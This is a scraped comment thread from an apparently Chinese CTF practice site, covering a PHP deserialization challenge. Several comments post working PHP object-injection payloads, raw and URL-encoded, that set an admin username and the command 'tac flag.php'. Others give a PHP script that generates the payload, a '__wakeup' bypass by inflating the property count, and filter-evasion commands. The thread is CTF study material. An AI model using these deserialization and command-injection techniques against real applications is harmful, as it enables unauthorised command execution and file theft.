评分(4)
解题动态
dlgz 攻破了该题 1天前
小王爱汉堡 攻破了该题 3天前
磊诺 攻破了该题 6天前
2523822945 攻破了该题 7天前
好累啊 攻破了该题 8天前
要加两个蛋 攻破了该题 8天前
lin123 攻破了该题 8天前
yiluoqingqiu 攻破了该题 8天前
柯润 攻破了该题 8天前
2970554631 攻破了该题 8天前
不嘻嘻123 攻破了该题 8天前
lmz123 攻破了该题 8天前
xiemeimei 攻破了该题 8天前
18353517196 攻破了该题 8天前
折海 攻破了该题 8天前
337556453 攻破了该题 8天前
Aurora* 攻破了该题 8天前
孙笑川ᒿ58 攻破了该题 8天前
123!!! 攻破了该题 8天前
评论
iamblue 1年前
举报
O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22%00%2A%00cmd%22%3Bs%3A12%3A%22tac+flag.php%22%3B%7D
tfios 1年前
举报
环境变量里边也有 FLAG
LLTVLL 1年前
举报
AI分析PHP序列化程序得出结果,注意补空格和占位符,降低学习PHP语言的成本,提升准确率。。。。
Bojing 2年前
举报
有哪里提示了username是admin的吗
numberone 1年前
举报
源代码里不是有个if语句:if ($this->username === 'admin')
18956160518 2年前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733
EtHat 2年前
举报
O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
xht0525 2年前
举报
nl flag.php|base64
不会编程的崽 2年前
举报
<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>
不会编程的崽 2年前
举报
O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
c41vin 2年前
举报
0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6